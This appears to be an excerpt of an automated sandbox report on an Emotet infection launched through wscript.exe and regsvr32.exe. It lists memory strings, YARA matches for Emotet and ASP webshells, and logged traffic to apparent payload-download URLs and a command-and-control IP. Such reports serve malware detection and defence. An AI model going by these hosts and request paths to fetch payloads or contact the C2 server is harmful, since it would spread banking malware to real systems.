Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://powerlift-user.acompli.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://pushchannel.1drv.ms
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://tasks.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: wscript.exe, 0000000A.00000003.345486407.0000000005467000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347498300.0000000005467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/
Source: wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
Source: wscript.exe, 0000000A.00000003.339493388.0000000005868000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.339423579.0000000005861000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000587C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.339989514.0000000005873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.339192665.000000000584F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/fice16
Source: wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
Source: 825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

HTTP traffic detected: POST /mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56

Source: unknown

DNS traffic detected: queries for: penshorn.org

Source: global traffic

HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org

Source: unknown	HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.7:49707 version: TLS 1.2

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 13.2.regsvr32.exe.c90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.1060000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.1060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.815803054.0000000000CC1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.815608298.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.320685564.0000000001060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: 0000000A.00000003.341725142.00000000057F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.339989514.0000000005873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.337950872.00000000057E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.337950872.00000000057E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.339286928.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
Source: 0000000A.00000003.339286928.00000000057F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\RPJQOdVdSbhDZ\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180006818	12_2_0000000180006818
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_000000018000B878	12_2_000000018000B878
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180007110	12_2_0000000180007110
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180008D28	12_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180014555	12_2_0000000180014555
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01020000	12_2_01020000
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01287D6C	12_2_01287D6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129A000	12_2_0129A000
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128CC14	12_2_0128CC14
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129709C	12_2_0129709C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01288BC8	12_2_01288BC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01298FC8	12_2_01298FC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128263C	12_2_0128263C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129AD28	12_2_0129AD28
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01294D20	12_2_01294D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01291924	12_2_01291924
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01286138	12_2_01286138
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01287530	12_2_01287530
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129B130	12_2_0129B130
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129610C	12_2_0129610C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A8500	12_2_012A8500
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01297518	12_2_01297518
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A9910	12_2_012A9910
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129BDA0	12_2_0129BDA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012895BC	12_2_012895BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129D5F0	12_2_0129D5F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012915C8	12_2_012915C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128B83C	12_2_0128B83C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01291030	12_2_01291030
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129EC30	12_2_0129EC30
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01289408	12_2_01289408
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01287C08	12_2_01287C08
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01281000	12_2_01281000
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A181C	12_2_012A181C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129B460	12_2_0129B460
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01282C78	12_2_01282C78
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128C078	12_2_0128C078
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128B07C	12_2_0128B07C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01296C70	12_2_01296C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128D474	12_2_0128D474
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129C44C	12_2_0129C44C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01287840	12_2_01287840
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129C058	12_2_0129C058
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A5450	12_2_012A5450
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012898AC	12_2_012898AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128DCB8	12_2_0128DCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A94BC	12_2_012A94BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129A8B0	12_2_0129A8B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01295880	12_2_01295880
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01284C84	12_2_01284C84
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129CC84	12_2_0129CC84
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128AC94	12_2_0128AC94
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012920E0	12_2_012920E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012890F8	12_2_012890F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012848FC	12_2_012848FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01283CF4	12_2_01283CF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012880CC	12_2_012880CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012908CC	12_2_012908CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128F8C4	12_2_0128F8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01295CC4	12_2_01295CC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012818DC	12_2_012818DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012814D4	12_2_012814D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01293CD4	12_2_01293CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128D33C	12_2_0128D33C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01294F18	12_2_01294F18
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129E310	12_2_0129E310
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128EF14	12_2_0128EF14
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01293B14	12_2_01293B14
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01288378	12_2_01288378
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128F77C	12_2_0128F77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129D770	12_2_0129D770
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129CF70	12_2_0129CF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01284758	12_2_01284758
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128975C	12_2_0128975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129E750	12_2_0129E750
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128DBA0	12_2_0128DBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128FFB8	12_2_0128FFB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01298BB8	12_2_01298BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01288FB0	12_2_01288FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01295384	12_2_01295384
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01281B94	12_2_01281B94
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A27EC	12_2_012A27EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128A7F0	12_2_0128A7F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012997CC	12_2_012997CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01293FD0	12_2_01293FD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01282FD4	12_2_01282FD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012833D4	12_2_012833D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128BA2C	12_2_0128BA2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01298A2C	12_2_01298A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01290E2C	12_2_01290E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129662C	12_2_0129662C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01298E08	12_2_01298E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01283E0C	12_2_01283E0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129020C	12_2_0129020C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01295A00	12_2_01295A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A8A00	12_2_012A8A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128461C	12_2_0128461C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01284214	12_2_01284214
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128A660	12_2_0128A660
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01290A70	12_2_01290A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01283274	12_2_01283274
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129A244	12_2_0129A244
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128B258	12_2_0128B258
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128F65C	12_2_0128F65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128AAB8	12_2_0128AAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01284EB8	12_2_01284EB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01283ABC	12_2_01283ABC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129A6BC	12_2_0129A6BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01288A8C	12_2_01288A8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012A4E8C	12_2_012A4E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128BE90	12_2_0128BE90
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01294A90	12_2_01294A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012892F0	12_2_012892F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128D6CC	12_2_0128D6CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129EAC0	12_2_0129EAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012996D4	12_2_012996D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00C80000	13_2_00C80000
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD08CC	13_2_00CD08CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC640A	13_2_00CC640A
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCCC14	13_2_00CCCC14
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC7D6C	13_2_00CC7D6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD76A8	13_2_00CD76A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC6E42	13_2_00CC6E42
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE0618	13_2_00CE0618
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC8BC8	13_2_00CC8BC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD8FC8	13_2_00CD8FC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD3FD0	13_2_00CD3FD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC63F4	13_2_00CC63F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE73A4	13_2_00CE73A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC9B79	13_2_00CC9B79
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC80CC	13_2_00CC80CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCF8C4	13_2_00CCF8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD5CC4	13_2_00CD5CC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC18DC	13_2_00CC18DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC14D4	13_2_00CC14D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD3CD4	13_2_00CD3CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE1CD4	13_2_00CE1CD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD20E0	13_2_00CD20E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC48FC	13_2_00CC48FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC90F8	13_2_00CC90F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC3CF4	13_2_00CC3CF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE488C	13_2_00CE488C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC4C84	13_2_00CC4C84
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDCC84	13_2_00CDCC84
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD5880	13_2_00CD5880
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD709C	13_2_00CD709C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCAC94	13_2_00CCAC94
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE1494	13_2_00CE1494
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC98AC	13_2_00CC98AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE44A8	13_2_00CE44A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE94BC	13_2_00CE94BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCDCB8	13_2_00CCDCB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDA8B0	13_2_00CDA8B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDC44C	13_2_00CDC44C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC7840	13_2_00CC7840
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDC058	13_2_00CDC058
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE5450	13_2_00CE5450
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE5868	13_2_00CE5868
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDB460	13_2_00CDB460
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCB07C	13_2_00CCB07C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC2C78	13_2_00CC2C78
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCC078	13_2_00CCC078
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCD474	13_2_00CCD474
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD6C70	13_2_00CD6C70
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC9408	13_2_00CC9408
